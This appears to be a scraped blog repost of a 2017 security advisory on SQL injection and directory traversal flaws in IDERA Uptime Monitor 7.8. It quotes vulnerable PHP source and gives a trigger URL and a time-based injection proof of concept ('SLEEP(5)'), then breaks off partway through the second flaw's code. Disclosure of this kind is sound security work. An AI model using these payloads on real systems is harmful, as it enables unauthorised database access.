{"id":7895,"date":"2017-06-08T14:19:36","date_gmt":"2017-06-08T22:19:36","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/06\/08\/news-1677\/"},"modified":"2017-06-08T14:19:36","modified_gmt":"2017-06-08T22:19:36","slug":"news-1677","status":"publish","type":"post","link":"https:\/\/www.palada.net\/index.php\/2017\/06\/08\/news-1677\/","title":{"rendered":"SSD Advisory \u2013 IDERA Uptime Monitor Multiple Vulnerabilities"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Thu, 08 Jun 2017 07:23:23 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3223\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><\/p>\n<p><script>var obj = jQuery('#a-href-3223');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script>  \t\t<\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerabilities Summary<\/strong><br \/> The following advisory describe three (3) vulnerabilities found in IDERA Uptime Monitor version 7.8.<\/p>\n<p>&#8220;IDERA Uptime Monitor is a Proactively monitor physical servers, virtual machines, network devices, applications, and services across multiple platforms running on-premise, remotely, or in the Cloud. Uptime Infrastructure Monitor provides a unified view of IT environment health and a GUI that is easily customizable, with a drag-anddrop dashboard design. Create private IT dashboards, team dashboards (server, application, capacity and networking teams, and even the specialist practitioner such as SharePoint farm administrators, etc.), and a network operations center (NOC) for the entire datacenter in minutes.&#8221;<\/p>\n<p>The vulnerabilities found are:<\/p>\n<ul>\n<li>SQL Injection (1)<\/li>\n<li>SQL Injection (2)<\/li>\n<li>Directory Traversal and File Access<\/li>\n<\/ul>\n<p><strong>Credit<\/strong><br \/> An independent security researcher has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor response<\/strong><br \/> We notified IDERA about the vulnerabilities back in March 2017, repeated attempts to re-establish contact and get some answers on the status of the patch for this vulnerabilities went unanswered. At this time there is no solution or workaround for this vulnerability.<\/p>\n<p><span id=\"more-3223\"><\/span><\/p>\n<p><strong><u>Vulnerabilities Details<\/u><\/strong><\/p>\n<p><strong>SQL Injection (1)<\/strong><br \/> IDERA Uptime Monitor 7.8 is affected by multiple SQL injection vulnerabilities. User controlled data is included in SQL queries made by the application without first being properly sanitized. As a result a remote unauthenticated user can inject arbitrary SQL queries into the application\u2019s back-end database<\/p>\n<p>The SQL injection vulnerability is located in \u201c\/gadgets\/definitions\/uptime.CapacityWhatIfGadget\/getmetrics.php\u201d:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5939cd7653292631031360\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> if (isset($_GET[&#8216;query_type&#8217;])) {      $query_type = $_GET[&#8216;query_type&#8217;];  }  if (isset($_GET[&#8216;uptime_offset&#8217;])) {      $offset = $_GET[&#8216;uptime_offset&#8217;];  }  if (isset($_GET[&#8216;time_frame&#8217;])) {      $time_frame = $_GET[&#8216;time_frame&#8217;];  } else {      $time_frame = 3;  }  if (isset($_GET[&#8216;metricType&#8217;])) {      $metricType = $_GET[&#8216;metricType&#8217;];  }  if (isset($_GET[&#8216;element&#8217;])) {      $vmware_object_id = $_GET[&#8216;element&#8217;];  }  $json = array();  $oneElement = array();  $performanceData = array();  \/\/date_default_timezone_set(&#8216;UTC&#8217;);  $db = new uptimeDB;  if ($db &#8211; &amp; gt; connectDB()) {      echo &#8220;&#8221;;  } else {      echo &#8220;unable to connect to DB exiting&#8221;;      exit(1);  }  if ($query_type == &#8220;osperf-Mem&#8221;) {      $min_mem_usage_array = array();      $max_mem_usage_array = array();      $avg_mem_usage_array = array();      $sql = &#8220;SELECT      e.entity_id,          e.display_name as NAME,          date(s.sample_time) as SAMPLE_TIME,          min(a.free_mem) as MIN_MEM_USAGE,          max(a.free_mem) as MAX_MEM_USAGE,          avg(a.free_mem) as AVG_MEM_USAGE,          min(c.memsize) as TOTAL_CAPACITY,          max(c.memsize),          avg(c.memsize),          day(s.sample_time),          month(s.sample_time),          year(s.sample_time)      FROM      performance_aggregate a, performance_sample s, entity e, entity_configuration c      WHERE      s.id = a.sample_id AND      s.uptimehost_id = e.entity_id AND      e.entity_id = c.entity_id AND      s.sample_time &amp; gt;      date_sub(now(), interval &#8220;. $time_frame . &#8221;          month) AND      e.entity_id = $vmware_object_id      GROUP BY      e.entity_id,          year(s.sample_time),          month(s.sample_time),          day(s.sample_time)<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0094 seconds] -->  <\/p>\n<p>User controlled data entering the HTTP GET parameter \u201celement\u201d is included as part of an SQL query that is executed if the \u201c$query_type\u201d variable is equal to \u201cosperf-Mem\u201d. Because the value of the \u201c$query_type\u201d variable can also be set using the HTTP GET parameter \u201cquery_type\u201d, a user can force the application to take the vulnerable code path, and execute the tainted SQL query. Visiting the following URL on a vulnerable installation will trigger the vulnerability, and return a verbose SQL error message.<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5939cd76532a3700132831\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> \/gadgets\/definitions\/uptime.CapacityWhatIfGadget\/getmetrics.php?query_type=osperfMem&amp;element=&#8217;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532a3700132831-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5939cd76532a3700132831-1\"><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">gadgets<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">definitions<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">uptime<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">CapacityWhatIfGadget<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">getmetrics<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">php<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">query_type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">osperfMem<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">element<\/span><span class=\"crayon-o\">=<\/span>&#8216;<\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0008 seconds] -->  <\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5939cd76532a8985351027\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> http:\/\/192.168.199.129:9999\/gadgets\/definitions\/uptime.CapacityWhatIfGadget\/getmetrics.php?query_type=osperf-Mem&amp;element=1%20AND%20SLEEP(5)<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532a8985351027-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5939cd76532a8985351027-1\"><span class=\"crayon-v\">http<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/192.168.199.129:9999\/gadgets\/definitions\/uptime.CapacityWhatIfGadget\/getmetrics.php?query_type=osperf-Mem&amp;element=1%20AND%20SLEEP(5)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0004 seconds] -->  <\/p>\n<p><strong>SQL Injection (2)<\/strong><br \/> IDERA Uptime Monitor 7.8 is affected by multiple SQL injection vulnerabilities. User controlled data is included in SQL queries made by the application without first being properly sanitized. As a result a remote unauthenticated user can inject arbitrary SQL queries into the application\u2019s back-end database<\/p>\n<p>The vulnerability is very similar in structure to the first SQL vulnerability, and is located in \u201c\/gadgets\/definitions\/uptime.CapacityWhatifGadget\/getxenmetrics.php\u201d<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5939cd76532ad882069961\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> if (isset($_GET[&#8216;query_type&#8217;])) {      $query_type = $_GET[&#8216;query_type&#8217;];  }  if (isset($_GET[&#8216;uptime_offset&#8217;])) {      $offset = $_GET[&#8216;uptime_offset&#8217;];  }  if (isset($_GET[&#8216;time_frame&#8217;])) {      $time_frame = $_GET[&#8216;time_frame&#8217;];  } else {      $time_frame = 3;  }  if (isset($_GET[&#8216;metricType&#8217;])) {      $metricType = $_GET[&#8216;metricType&#8217;];  }  if (isset($_GET[&#8216;element&#8217;])) {      $element_id = $_GET[&#8216;element&#8217;];  }  $json = array();  $oneElement = array();  $performanceData = array();  \/\/date_default_timezone_set(&#8216;UTC&#8217;);  $db = new uptimeDB;  if ($db &#8211; &amp; gt; connectDB()) {      echo &#8220;&#8221;;  } else {      echo &#8220;unable to connect to DB exiting&#8221;;      exit(1);  }  if ($query_type == &#8220;xenserver-Mem&#8221;) {      $min_mem_usage_array = array();      $max_mem_usage_array = array();      $avg_mem_usage_array = array();      $getXenServerMemUsedsql = &#8220;SELECT      e.entity_id,          e.display_name as NAME,          date(dd.sampletime) as SAMPLE_TIME,          min(dd.value) as MIN_MEM_USAGE,          max(dd.value) as MAX_MEM_USAGE,          avg(dd.value) as AVG_MEM_USAGE,          day(dd.sampletime),          month(dd.sampletime),          year(dd.sampletime)      FROM      erdc_base b, erdc_configuration c, erdc_parameter p,      erdc_decimal_data dd, erdc_instance i, entity e      WHERE      b.name = &#8216;XenServer&#8217;      AND      b.erdc_base_id = c.erdc_base_id AND      b.erdc_base_id = p.erdc_base_id AND      p.name = &#8216;hostMemUsed&#8217;      AND      p.erdc_parameter_id = dd.erdc_parameter_id AND      dd.erdc_instance_id = i.erdc_instance_id AND      dd.sampletime &amp; gt;      date_sub(now(), interval &#8220;. $time_frame . &#8221;          month)      AND      i.entity_id = e.entity_id AND      e.entity_id = $element_id      GROUP BY      e.entity_id,          year(dd.sampletime),          month(dd.sampletime),          day(dd.sampletime)      &#8220;;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532ad882069961-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532ad882069961-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532ad882069961-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532ad882069961-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532ad882069961-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532ad882069961-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532ad882069961-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532ad882069961-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532ad882069961-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532ad882069961-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532ad882069961-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532ad882069961-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532ad882069961-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532ad882069961-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532ad882069961-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532ad882069961-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532ad882069961-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532ad882069961-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532ad882069961-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532ad882069961-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532ad882069961-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532ad882069961-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532ad882069961-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532ad882069961-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532ad882069961-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532ad882069961-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532ad882069961-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532ad882069961-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532ad882069961-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532ad882069961-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532ad882069961-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532ad882069961-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532ad882069961-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532ad882069961-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532ad882069961-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532ad882069961-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532ad882069961-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532ad882069961-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532ad882069961-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532ad882069961-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532ad882069961-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532ad882069961-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532ad882069961-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532ad882069961-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532ad882069961-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532ad882069961-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532ad882069961-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532ad882069961-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532ad882069961-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532ad882069961-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532ad882069961-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532ad882069961-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532ad882069961-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532ad882069961-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532ad882069961-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532ad882069961-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532ad882069961-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532ad882069961-58\">58<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532ad882069961-59\">59<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532ad882069961-60\">60<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532ad882069961-61\">61<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532ad882069961-62\">62<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532ad882069961-63\">63<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532ad882069961-64\">64<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532ad882069961-65\">65<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532ad882069961-66\">66<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5939cd76532ad882069961-1\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">isset<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_GET<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;query_type&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532ad882069961-2\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">query_type<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_GET<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;query_type&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532ad882069961-3\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532ad882069961-4\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">isset<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_GET<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;uptime_offset&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532ad882069961-5\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">offset<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_GET<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;uptime_offset&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532ad882069961-6\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532ad882069961-7\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">isset<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_GET<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;time_frame&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532ad882069961-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">time_frame<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_GET<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;time_frame&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532ad882069961-9\"><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532ad882069961-10\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">time_frame<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><span 